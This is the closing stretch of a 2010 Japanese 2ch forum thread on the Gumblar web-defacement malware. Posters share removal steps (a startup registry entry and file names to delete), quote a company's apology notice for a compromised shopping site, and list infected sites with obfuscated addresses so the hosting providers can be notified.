2010/01/18(月) 22:35:52立てます?
0950名無しさん@お腹いっぱい。
2010/01/18(月) 22:48:32msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)
削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263822552/
次立てました
0953名無しさん@お腹いっぱい。
2010/01/18(月) 22:56:22お詫び天才してくれね?
0954名無しさん@お腹いっぱい。
2010/01/18(月) 23:00:00弊社ホームページのうち一部のサイトにおいて、第三者の不正アクセスにより改ざんされていたことが判明致しました。当該サイトに下記期間中にアクセス頂いたお客様には大変ご心配、ご迷惑をおかけいたしました。深くお詫び申し上げます。
1.対象サイト
* テルモヘルスケアショッピングサイト
(http://www.terumo.co.jp/healthcare/shopping/index.html)
2.改ざんされていた期間
* 2010年1月15日(金) 15:00 〜 2010年1月18日(月) 09:30
3.改ざんに伴う影響
* 上記期間、対象サイトにアクセスした場合は、ウィルスに感染する可能性があります。
* ウィルスに感染した場合は、意図しないサイトへ誘導される可能性があります。
4.原因となったウィルス
* ウィルスの種類 : 「Gumblar(ガンブラー)」亜種
5.感染の確認方法、駆除方法
* 下記のサイトにて感染の確認および駆除が可能です。(無料)
トレンドマイクロ社 オンラインスキャン
http://www.trendflexsecurity.jp/housecall/index.html?WT.ac=JPclusty_onlinescan
6.個人情報に扱い
* ショッピングに関する個人情報は、別サイト(http://www.e-terumo.jp/healthcare/)で扱っているため今回の影響はございません。
0955名無しさん@お腹いっぱい。
2010/01/18(月) 23:02:48む。
0956名無しさん@お腹いっぱい。
2010/01/18(月) 23:03:22s-palcallは依然放置か
aguseもgredもスルーするし改竄されてることに気づいてないんだろうか
0957名無しさん@お腹いっぱい。
2010/01/18(月) 23:08:26のオンラインスキャンってちゃんと対応してるの?
0958938
2010/01/18(月) 23:08:290959名無しさん@お腹いっぱい。
2010/01/18(月) 23:15:47通報願い
化粧品サイト
ttp://www.marielouise-cosme●jp/
通販カタログ?
ttp://www.askulnet●com/
化粧品の宣伝
ttp://mesia.nicestyle●org/asuka/
ttp://abi.velvet●jp/link/ リンク先も
ホスト丸ごと?
ttp://54.hou-hou●com/
ttp://104.hou-hou●com/
ttp://kaden.hou-hou●com/
とか。
化粧品の宣伝多いね
0960名無しさん@お腹いっぱい。
2010/01/18(月) 23:21:25おつー
どんどん増えてるねー 国が関わってるのかしらw
0961名無しさん@お腹いっぱい。
2010/01/18(月) 23:22:590962名無しさん@お腹いっぱい。
2010/01/18(月) 23:29:13これからどんどん増えていきそうだし
0963名無しさん@お腹いっぱい。
2010/01/18(月) 23:32:37民主がやりそうなこったな
0964名無しさん@お腹いっぱい。
2010/01/18(月) 23:32:56鯖管何しとんのやー
首だ首
0965名無しさん@お腹いっぱい。
2010/01/18(月) 23:46:02ブラウザから送信できるFAXとかで連絡しないと駄目かな
0966名無しさん@お腹いっぱい。
2010/01/18(月) 23:48:09本人にいってもろくに通じない
レンタルサーバならレンタル元のが確実で楽
0967名無しさん@お腹いっぱい。
2010/01/18(月) 23:55:39個人ブログとかもで連絡先・メールアドレス無い場合はサーバの方にメールすればいいの?
貴重なご意見ありがとうございます的なテンプレメールすら来ないってイメージがある
0968名無しさん@お腹いっぱい。
2010/01/18(月) 23:58:240969名無しさん@お腹いっぱい。
2010/01/19(火) 00:00:403大対策ソフトも後追い状況で自称IT専門家みたいな人は全然気づいてない
感染だけが進行して行く
0970名無しさん@お腹いっぱい。
2010/01/19(火) 00:00:410971名無しさん@お腹いっぱい。
2010/01/19(火) 00:00:56ブログがどっかのサービスのものならそこのサービス元に連絡すれば
対応してくれるよ
平日昼間のみだろうけど
0972名無しさん@お腹いっぱい。
2010/01/19(火) 00:10:13そうなんだ。ありがと。
0973名無しさん@お腹いっぱい。
2010/01/19(火) 00:24:34htmlを弄れてFTPが使えるとこはやられる可能性がある
0974名無しさん@お腹いっぱい。
2010/01/19(火) 00:34:35ttp://blog.ecstudio.jp/ec_studio_blog/090522geno-virus.html
こういう間違った記事を書いてるとこにも凸※したほうが良いのかな?
0975名無しさん@お腹いっぱい。
2010/01/19(火) 00:36:51トレンドマイクロ社 オンラインスキャンで駆除出来るもんなの?
0976名無しさん@お腹いっぱい。
2010/01/19(火) 00:37:083番目ホスト丸ごとにゃ /index.php
済
www●marielouise-cosme●jp
www●askulnet●com
0977名無しさん@お腹いっぱい。
2010/01/19(火) 00:55:56www●runandgun●co●jp
0978名無しさん@お腹いっぱい。
2010/01/19(火) 01:00:50乙です
0979名無しさん@お腹いっぱい。
2010/01/19(火) 01:18:24済
mesia●nicestyle●org める
abi●velvet●jp ろりぽ リンク先は見なかった(ry
0980名無しさん@お腹いっぱい。
2010/01/19(火) 01:29:27hou-hou●com さくら
0981名無しさん@お腹いっぱい。
2010/01/19(火) 01:33:59「改竄する→このスレで報告」
0982名無しさん@お腹いっぱい。
2010/01/19(火) 01:36:32www●runandgun●co●jp める
0984名無しさん@お腹いっぱい。
2010/01/19(火) 01:50:380985名無しさん@お腹いっぱい。
2010/01/19(火) 03:21:050986名無しさん@お腹いっぱい。
2010/01/19(火) 03:32:41ナイスw
0987名無しさん@お腹いっぱい。
2010/01/19(火) 03:35:080988名無しさん@お腹いっぱい。
2010/01/19(火) 05:36:45親切なら一言言ったほうがいいかと
0989名無しさん@お腹いっぱい。
2010/01/19(火) 09:04:40もっと訴求力のある訴え方をしないとどうにもならない。
0990名無しさん@お腹いっぱい。
2010/01/19(火) 09:13:56gumblar な
0991名無しさん@お腹いっぱい。
2010/01/19(火) 10:32:49TVで初めて知る程度の人にここのようなことを言っても理解できないよ。
0992名無しさん@お腹いっぱい。
2010/01/19(火) 10:55:310993名無しさん@お腹いっぱい。
2010/01/19(火) 10:58:10ttp://pc11.2ch.net/test/read.cgi/sec/1263822552/l50
まずこっちだろ
0994名無しさん@お腹いっぱい。
2010/01/19(火) 11:00:200995名無しさん@お腹いっぱい。
2010/01/19(火) 11:11:22何で993を19日に立ててるんだ?
0996名無しさん@お腹いっぱい。
2010/01/19(火) 11:18:41992が19日で993が18日
0997名無しさん@お腹いっぱい。
2010/01/19(火) 11:38:41こういう奴がガンブラーなんかに引っかかるんだろうなw
0998名無しさん@お腹いっぱい。
2010/01/19(火) 11:51:440999名無しさん@お腹いっぱい。
2010/01/19(火) 12:03:30【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263822552/
1000名無しさん@お腹いっぱい。
2010/01/19(火) 12:08:3310011001
Over 1000Threadもう書けないので、新しいスレッドを立ててくださいです。。。
レス数が1000を超えています。これ以上書き込みはできません。